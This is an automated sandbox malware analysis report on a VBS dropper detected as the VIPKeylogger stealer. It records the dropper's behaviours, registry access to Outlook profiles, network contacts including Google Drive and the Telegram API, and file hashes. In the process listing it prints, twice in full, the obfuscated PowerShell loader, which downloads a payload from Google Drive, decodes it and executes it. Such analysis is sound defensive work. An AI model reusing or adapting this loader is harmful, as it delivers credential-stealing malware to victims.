Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-sfclpswela
Target DistribucionesEnelcaJanS.L.PEDIDO456799.vbs
SHA256 a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
Tags
vipkeylogger collection discovery execution keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237

Threat Level: Known bad

The file DistribucionesEnelcaJanS.L.PEDIDO456799.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 15:03

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 15:03

Reported

2024-10-23 15:06

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 168.6.122.193.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/4100-0-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsmfcryq.gh4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4100-10-0x000002C005BE0000-0x000002C005C02000-memory.dmp

memory/4100-11-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-12-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-15-0x00007FFBD1883000-0x00007FFBD1885000-memory.dmp

memory/4100-16-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-17-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/4100-20-0x00007FFBD1880000-0x00007FFBD2341000-memory.dmp

memory/1032-21-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/1032-22-0x0000000005BA0000-0x00000000061C8000-memory.dmp

memory/1032-23-0x0000000005930000-0x0000000005952000-memory.dmp

memory/1032-24-0x00000000059D0000-0x0000000005A36000-memory.dmp

memory/1032-25-0x00000000061D0000-0x0000000006236000-memory.dmp

memory/1032-31-0x0000000006240000-0x0000000006594000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

memory/1032-37-0x00000000067E0000-0x00000000067FE000-memory.dmp

memory/1032-38-0x0000000006810000-0x000000000685C000-memory.dmp

memory/1032-39-0x0000000008040000-0x00000000086BA000-memory.dmp

memory/1032-40-0x0000000006D50000-0x0000000006D6A000-memory.dmp

memory/1032-41-0x0000000007A60000-0x0000000007AF6000-memory.dmp

memory/1032-42-0x00000000079F0000-0x0000000007A12000-memory.dmp

memory/1032-43-0x0000000008C70000-0x0000000009214000-memory.dmp

C:\Users\Admin\AppData\Roaming\Bindehindens.Stu

MD5 d43327229caac3f1c1c7443675eaa345
SHA1 169d456a6122e6a39603f3017eb16df162aca251
SHA256 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
SHA512 da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d

memory/1032-45-0x0000000009220000-0x000000000E52E000-memory.dmp

memory/4656-58-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/4656-59-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/4656-60-0x0000000000800000-0x0000000000848000-memory.dmp

memory/4656-61-0x0000000024BC0000-0x0000000024C5C000-memory.dmp

memory/4656-62-0x0000000025840000-0x0000000025A02000-memory.dmp

memory/4656-63-0x0000000025670000-0x00000000256C0000-memory.dmp

memory/4656-65-0x0000000025770000-0x0000000025802000-memory.dmp

memory/4656-66-0x0000000025720000-0x000000002572A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

